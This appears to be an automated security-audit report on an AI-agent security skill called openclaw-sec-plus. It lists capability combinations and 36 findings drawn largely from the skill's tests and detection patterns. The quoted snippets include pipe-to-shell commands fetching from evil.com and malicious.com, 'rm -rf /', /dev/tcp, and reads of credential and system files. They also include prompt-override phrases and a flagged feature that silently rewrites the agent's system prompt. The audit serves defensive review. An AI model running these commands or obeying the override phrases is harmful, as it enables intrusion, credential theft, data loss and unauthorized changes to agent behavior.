ClawAudit verdict
openclaw-sec
openclaw-sec-plus
Receives external input AND executes processes
Nearly identical to openclaw-sec, but the Action Engine diagram shows "Rewrite System Prompts" instead of "Return Result", indicating that this variant can silently modify the agent's system prompt as an automated security response, which constitutes unauthorized agent behavior modification.
What it does
These are capability combinations: each listed behavior occurs somewhere in the skill, but ClawAudit only detects their co-occurrence — it does not verify that the output of one actually flows into the other. Read the code to confirm a live chain.
Receives external input AND executes processes — the shape of a command & control channel
LLM05 · LLM06 · ASI10
Executes processes AND makes external network calls — may exfiltrate command output
LLM02 · LLM06 · ASI03
Accesses credentials AND makes external network calls — potential credential theft
LLM02 · ASI03
Accesses credentials AND encodes data — may obfuscate stolen credentials
LLM02 · ASI03 · ASI04
Installs packages AND executes processes — opaque dependency chain with execution
LLM03 · ASI04
Permission integrity
network_out
credential_access
package_install
Findings (36)
Recursive delete from root or home — destructive command
SKILL.md · code · rm -rf /
Accesses sensitive system files
SKILL.md · code · /etc/passwd
Reads /proc/self/environ — dumps all environment variables
SKILL.md · code · /proc/self/environ
Prompt injection — tries to override agent instructions
SKILL.md · code · Ignore all previous instructions
Unicode homoglyph detected — uses lookalike characters to evade pattern matching
src/modules/content-scanner/__tests__/scanner.test.ts · prose
HTTP request to bare IP address — common in malicious payloads
SKILL.md · code · http://169.254.169.254
Possible prompt injection — attempts to redefine agent identity
SKILL.md · code · You are now
subprocess execution — runs system commands from Python
SKILL.md · code · subprocess.run(
Dynamic __import__('os') — Python OS command execution
src/modules/code-execution-detector/__tests__/detector.test.ts · prose · downgraded · __import__("os")
Direct __builtins__ access — can invoke any builtin function
src/modules/code-execution-detector/__tests__/detector.test.ts · prose · downgraded · __builtins__.
Pipe to bash — executes piped content as shell commands
src/modules/command-validator/__tests__/validator.test.ts · prose · downgraded · | bash
Pipe-to-shell pattern (curl | sh) — supply chain attack vector
src/modules/command-validator/__tests__/validator.test.ts · prose · downgraded · curl http://evil.com/script.sh | bash
Pipe-to-shell pattern (wget | sh)
src/modules/command-validator/__tests__/validator.test.ts · prose · downgraded · wget http://malicious.com/script.sh -O - | bash
Bash /dev/tcp — raw TCP connection via shell
src/modules/command-validator/__tests__/validator.test.ts · prose · downgraded · /dev/tcp/
Uses eval() — can execute arbitrary code
src/modules/content-scanner/__tests__/scanner.test.ts · prose · downgraded · eval(
Possible hardcoded credential
src/modules/secret-detector/__tests__/detector.test.ts · prose · downgraded · api_key = "abcdefghijklmnopqrstuvwxyz
Dynamic Function constructor — equivalent to eval()
src/patterns/runtime-validation/code-execution-patterns.ts · prose · downgraded · new Function(
Pipe to sh — executes piped content as shell commands
src/patterns/runtime-validation/command-injection.ts · prose · downgraded · |sh
Popular HTTP library — network access
SKILL.md · code · Got
References webhook/callback URL
SKILL.md · code · webhook_url
Dynamic import() — loads module at runtime
jest.config.js · prose · downgraded · import("
Accesses OpenClaw config/secrets directly
plugins/security-input-validator-plugin/install.ts · prose · downgraded · ~/.openclaw/openclaw.json
References child_process — can spawn system processes
src/__tests__/cli.test.ts · prose · downgraded · child_process
Uses exec() — may execute shell commands
src/core/database-manager.ts · prose · downgraded · exec(
Reads files from sensitive system paths
src/modules/code-execution-detector/__tests__/detector.test.ts · prose · downgraded · readFileSync("/etc
os.system/popen — direct OS command execution
src/modules/code-execution-detector/__tests__/detector.test.ts · prose · downgraded · os.system(
subprocess with shell=True — command injection vector
src/modules/command-validator/__tests__/validator.test.ts · prose · downgraded · subprocess.Popen("whoami", shell=True
Base64 decode (atob) — may hide malicious payloads
src/modules/content-scanner/__tests__/scanner.test.ts · prose · downgraded · atob(
Accesses .ssh directory
src/modules/path-validator/__tests__/validator.test.ts · prose · downgraded · .ssh/
References SSH/GPG private keys
src/modules/path-validator/__tests__/validator.test.ts · prose · downgraded · ssh_key
References sudo — requests elevated privileges
src/patterns/prompt-injection/policy-puppetry-zh.ts · prose · downgraded · sudo
Base64 encoding/decoding
src/modules/content-scanner/__tests__/scanner.test.ts · prose · downgraded · base64_encode
String.fromCharCode — can build strings to evade detection
src/modules/content-scanner/__tests__/scanner.test.ts · prose · downgraded · String.fromCharCode
Base64 encode (btoa) — may obfuscate data exfiltration
src/modules/content-scanner/__tests__/scanner.test.ts · prose · downgraded · btoa(
References tunneling service
src/modules/exfiltration-detector/__tests__/detector.test.ts · prose · downgraded · ngrok
Sets world-executable permissions
src/patterns/runtime-validation/command-injection.ts · prose · downgraded · chmod 777
Why the tier is capped
Execution sink present in raw bytes (Hard Floor: class A/D/E). Final tier capped at Caution — cannot be lifted by any downgrade, example-payload opt-in, or allowlist.
Permissions & capabilities
No declared permissions — minimal attack surface.
Capabilities: credential_access · network_in · package_install · network_out · data_encoding · process_exec